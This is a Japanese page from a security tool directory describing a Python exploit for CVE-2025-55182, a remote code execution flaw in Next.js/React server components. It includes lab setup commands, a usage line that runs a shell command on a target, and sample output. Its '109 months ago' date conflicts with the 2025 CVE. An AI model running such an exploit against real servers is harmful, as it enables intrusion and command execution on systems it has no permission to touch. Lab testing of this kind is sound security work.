Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/liamromanis101/cve-2025-55182
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育リモートアクセスツールラボと実践
GitHubliamromanis101/cve-2025-55182

cve-2025-55182

Next.js/ReactのサーバーサイドJavaScriptインジェクションにより、不正なマルチパートフォームデータを介してリモートコード実行を可能にするCVE-2025-55182のPythonエクスプロイトです。許可されたテスト用のラボセットアップを含みます。

リポジトリを見る
109ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 Python Exploit

Python 3 スクリプト。CVE-2025-55182 を実証するために使用できます。Next.js/React アプリケーションのサーバーサイド JavaScript インジェクション脆弱性を悪用し、不正なマルチパートフォームデータを介した リモートコード実行 を可能にします。

⚠️ 教育および許可されたテスト目的のみに使用してください。


ラボのセットアップ

https://securitylabs.datadoghq.com/articles/cve-2025-55182-react2shell-remote-code-execution-react-server-components/ より

root@kitploit:~
npx [email protected] sample-app --yes
cd sample app
npm run build
npm run start

🚀 使用方法

🔧 前提条件

root@kitploit:~
pip install requests

使用例

root@kitploit:~
python3 exploit_cve_2025_55182.py -u http://localhost:3000 -c "id"

オプション

-u ターゲットのドメインまたはIP(プロトコル付き) - http://localhost:3000 -c サーバー上で実行するコマンド - id

出力例

root@kitploit:~
[+] Sending exploit to http://localhost:3000 with command: id
[+] Command Result:
uid=1000(app) gid=1000(app) groups=1000(app)

参照

https://securitylabs.datadoghq.com/articles/cve-2025-55182-react2shell-remote-code-execution-react-server-components/

ツールをダウンロード